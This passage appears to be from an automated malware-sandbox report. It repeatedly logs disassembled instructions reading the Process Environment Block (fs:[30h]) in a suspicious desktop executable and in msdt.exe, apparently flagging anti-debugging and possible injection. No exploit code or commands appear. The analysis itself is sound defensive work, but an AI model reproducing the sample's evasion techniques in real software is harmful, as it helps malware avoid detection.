          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]7_2_019103E2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]7_2_019103E2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]7_2_019103E2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019103E2 mov eax, dword ptr fs:[00000030h]7_2_019103E2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190DBE9 mov eax, dword ptr fs:[00000030h]7_2_0190DBE9
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A131B mov eax, dword ptr fs:[00000030h]7_2_019A131B
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8B58 mov eax, dword ptr fs:[00000030h]7_2_019B8B58
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EDB40 mov eax, dword ptr fs:[00000030h]7_2_018EDB40
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EF358 mov eax, dword ptr fs:[00000030h]7_2_018EF358
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01913B7A mov eax, dword ptr fs:[00000030h]7_2_01913B7A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01913B7A mov eax, dword ptr fs:[00000030h]7_2_01913B7A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EDB60 mov ecx, dword ptr fs:[00000030h]7_2_018EDB60
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191D294 mov eax, dword ptr fs:[00000030h]7_2_0191D294
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191D294 mov eax, dword ptr fs:[00000030h]7_2_0191D294
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191FAB0 mov eax, dword ptr fs:[00000030h]7_2_0191FAB0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]7_2_018E52A5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]7_2_018E52A5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]7_2_018E52A5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]7_2_018E52A5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E52A5 mov eax, dword ptr fs:[00000030h]7_2_018E52A5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FAAB0 mov eax, dword ptr fs:[00000030h]7_2_018FAAB0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FAAB0 mov eax, dword ptr fs:[00000030h]7_2_018FAAB0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912ACB mov eax, dword ptr fs:[00000030h]7_2_01912ACB
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912AE4 mov eax, dword ptr fs:[00000030h]7_2_01912AE4
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F8A0A mov eax, dword ptr fs:[00000030h]7_2_018F8A0A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01903A1C mov eax, dword ptr fs:[00000030h]7_2_01903A1C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AAA16 mov eax, dword ptr fs:[00000030h]7_2_019AAA16
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AAA16 mov eax, dword ptr fs:[00000030h]7_2_019AAA16
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EAA16 mov eax, dword ptr fs:[00000030h]7_2_018EAA16
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EAA16 mov eax, dword ptr fs:[00000030h]7_2_018EAA16
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E5210 mov eax, dword ptr fs:[00000030h]7_2_018E5210
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E5210 mov ecx, dword ptr fs:[00000030h]7_2_018E5210
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E5210 mov eax, dword ptr fs:[00000030h]7_2_018E5210
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E5210 mov eax, dword ptr fs:[00000030h]7_2_018E5210
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01924A2C mov eax, dword ptr fs:[00000030h]7_2_01924A2C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01924A2C mov eax, dword ptr fs:[00000030h]7_2_01924A2C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01974257 mov eax, dword ptr fs:[00000030h]7_2_01974257
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]7_2_018E9240
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]7_2_018E9240
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]7_2_018E9240
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E9240 mov eax, dword ptr fs:[00000030h]7_2_018E9240
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AEA55 mov eax, dword ptr fs:[00000030h]7_2_019AEA55
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192927A mov eax, dword ptr fs:[00000030h]7_2_0192927A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199B260 mov eax, dword ptr fs:[00000030h]7_2_0199B260
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199B260 mov eax, dword ptr fs:[00000030h]7_2_0199B260
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8A62 mov eax, dword ptr fs:[00000030h]7_2_019B8A62
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]7_2_018E2D8A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]7_2_018E2D8A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]7_2_018E2D8A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]7_2_018E2D8A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E2D8A mov eax, dword ptr fs:[00000030h]7_2_018E2D8A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191FD9B mov eax, dword ptr fs:[00000030h]7_2_0191FD9B
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191FD9B mov eax, dword ptr fs:[00000030h]7_2_0191FD9B
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]7_2_01912581
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]7_2_01912581
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]7_2_01912581
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01912581 mov eax, dword ptr fs:[00000030h]7_2_01912581
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01911DB5 mov eax, dword ptr fs:[00000030h]7_2_01911DB5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01911DB5 mov eax, dword ptr fs:[00000030h]7_2_01911DB5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01911DB5 mov eax, dword ptr fs:[00000030h]7_2_01911DB5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019135A1 mov eax, dword ptr fs:[00000030h]7_2_019135A1
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B05AC mov eax, dword ptr fs:[00000030h]7_2_019B05AC
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B05AC mov eax, dword ptr fs:[00000030h]7_2_019B05AC
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]7_2_01966DC9
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]7_2_01966DC9
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]7_2_01966DC9
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov ecx, dword ptr fs:[00000030h]7_2_01966DC9
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]7_2_01966DC9
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966DC9 mov eax, dword ptr fs:[00000030h]7_2_01966DC9
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01998DF1 mov eax, dword ptr fs:[00000030h]7_2_01998DF1
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FD5E0 mov eax, dword ptr fs:[00000030h]7_2_018FD5E0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FD5E0 mov eax, dword ptr fs:[00000030h]7_2_018FD5E0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]7_2_019AFDE2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]7_2_019AFDE2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]7_2_019AFDE2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AFDE2 mov eax, dword ptr fs:[00000030h]7_2_019AFDE2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0196A537 mov eax, dword ptr fs:[00000030h]7_2_0196A537
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AE539 mov eax, dword ptr fs:[00000030h]7_2_019AE539
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914D3B mov eax, dword ptr fs:[00000030h]7_2_01914D3B
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914D3B mov eax, dword ptr fs:[00000030h]7_2_01914D3B
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01914D3B mov eax, dword ptr fs:[00000030h]7_2_01914D3B
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8D34 mov eax, dword ptr fs:[00000030h]7_2_019B8D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F3D34 mov eax, dword ptr fs:[00000030h]7_2_018F3D34
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EAD30 mov eax, dword ptr fs:[00000030h]7_2_018EAD30
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01907D50 mov eax, dword ptr fs:[00000030h]7_2_01907D50
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01923D43 mov eax, dword ptr fs:[00000030h]7_2_01923D43
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01963540 mov eax, dword ptr fs:[00000030h]7_2_01963540
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190C577 mov eax, dword ptr fs:[00000030h]7_2_0190C577
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190C577 mov eax, dword ptr fs:[00000030h]7_2_0190C577
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F849B mov eax, dword ptr fs:[00000030h]7_2_018F849B
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8CD6 mov eax, dword ptr fs:[00000030h]7_2_019B8CD6
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A14FB mov eax, dword ptr fs:[00000030h]7_2_019A14FB
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966CF0 mov eax, dword ptr fs:[00000030h]7_2_01966CF0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966CF0 mov eax, dword ptr fs:[00000030h]7_2_01966CF0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966CF0 mov eax, dword ptr fs:[00000030h]7_2_01966CF0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B740D mov eax, dword ptr fs:[00000030h]7_2_019B740D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B740D mov eax, dword ptr fs:[00000030h]7_2_019B740D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B740D mov eax, dword ptr fs:[00000030h]7_2_019B740D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1C06 mov eax, dword ptr fs:[00000030h]7_2_019A1C06
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]7_2_01966C0A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]7_2_01966C0A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]7_2_01966C0A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01966C0A mov eax, dword ptr fs:[00000030h]7_2_01966C0A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191BC2C mov eax, dword ptr fs:[00000030h]7_2_0191BC2C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197C450 mov eax, dword ptr fs:[00000030h]7_2_0197C450
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197C450 mov eax, dword ptr fs:[00000030h]7_2_0197C450
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A44B mov eax, dword ptr fs:[00000030h]7_2_0191A44B
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190746D mov eax, dword ptr fs:[00000030h]7_2_0190746D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967794 mov eax, dword ptr fs:[00000030h]7_2_01967794
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967794 mov eax, dword ptr fs:[00000030h]7_2_01967794
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01967794 mov eax, dword ptr fs:[00000030h]7_2_01967794
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F8794 mov eax, dword ptr fs:[00000030h]7_2_018F8794
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019237F5 mov eax, dword ptr fs:[00000030h]7_2_019237F5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190F716 mov eax, dword ptr fs:[00000030h]7_2_0190F716
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197FF10 mov eax, dword ptr fs:[00000030h]7_2_0197FF10
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197FF10 mov eax, dword ptr fs:[00000030h]7_2_0197FF10
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B070D mov eax, dword ptr fs:[00000030h]7_2_019B070D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B070D mov eax, dword ptr fs:[00000030h]7_2_019B070D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A70E mov eax, dword ptr fs:[00000030h]7_2_0191A70E
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A70E mov eax, dword ptr fs:[00000030h]7_2_0191A70E
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E4F2E mov eax, dword ptr fs:[00000030h]7_2_018E4F2E
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018E4F2E mov eax, dword ptr fs:[00000030h]7_2_018E4F2E
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191E730 mov eax, dword ptr fs:[00000030h]7_2_0191E730
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FEF40 mov eax, dword ptr fs:[00000030h]7_2_018FEF40
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018FFF60 mov eax, dword ptr fs:[00000030h]7_2_018FFF60
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8F6A mov eax, dword ptr fs:[00000030h]7_2_019B8F6A
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0197FE87 mov eax, dword ptr fs:[00000030h]7_2_0197FE87
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019646A7 mov eax, dword ptr fs:[00000030h]7_2_019646A7
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B0EA5 mov eax, dword ptr fs:[00000030h]7_2_019B0EA5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B0EA5 mov eax, dword ptr fs:[00000030h]7_2_019B0EA5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B0EA5 mov eax, dword ptr fs:[00000030h]7_2_019B0EA5
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019B8ED6 mov eax, dword ptr fs:[00000030h]7_2_019B8ED6
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01928EC7 mov eax, dword ptr fs:[00000030h]7_2_01928EC7
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199FEC0 mov eax, dword ptr fs:[00000030h]7_2_0199FEC0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019136CC mov eax, dword ptr fs:[00000030h]7_2_019136CC
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F76E2 mov eax, dword ptr fs:[00000030h]7_2_018F76E2
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019116E0 mov ecx, dword ptr fs:[00000030h]7_2_019116E0
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A61C mov eax, dword ptr fs:[00000030h]7_2_0191A61C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0191A61C mov eax, dword ptr fs:[00000030h]7_2_0191A61C
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EC600 mov eax, dword ptr fs:[00000030h]7_2_018EC600
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EC600 mov eax, dword ptr fs:[00000030h]7_2_018EC600
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EC600 mov eax, dword ptr fs:[00000030h]7_2_018EC600
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01918E00 mov eax, dword ptr fs:[00000030h]7_2_01918E00
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019A1608 mov eax, dword ptr fs:[00000030h]7_2_019A1608
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0199FE3F mov eax, dword ptr fs:[00000030h]7_2_0199FE3F
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018EE620 mov eax, dword ptr fs:[00000030h]7_2_018EE620
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F7E41 mov eax, dword ptr fs:[00000030h]7_2_018F7E41
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AAE44 mov eax, dword ptr fs:[00000030h]7_2_019AAE44
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019AAE44 mov eax, dword ptr fs:[00000030h]7_2_019AAE44
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_018F766D mov eax, dword ptr fs:[00000030h]7_2_018F766D
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]7_2_0190AE73
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]7_2_0190AE73
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]7_2_0190AE73
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]7_2_0190AE73
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0190AE73 mov eax, dword ptr fs:[00000030h]7_2_0190AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474746D mov eax, dword ptr fs:[00000030h]13_2_0474746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BC450 mov eax, dword ptr fs:[00000030h]13_2_047BC450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BC450 mov eax, dword ptr fs:[00000030h]13_2_047BC450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A44B mov eax, dword ptr fs:[00000030h]13_2_0475A44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475BC2C mov eax, dword ptr fs:[00000030h]13_2_0475BC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]13_2_047A6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]13_2_047A6C0A
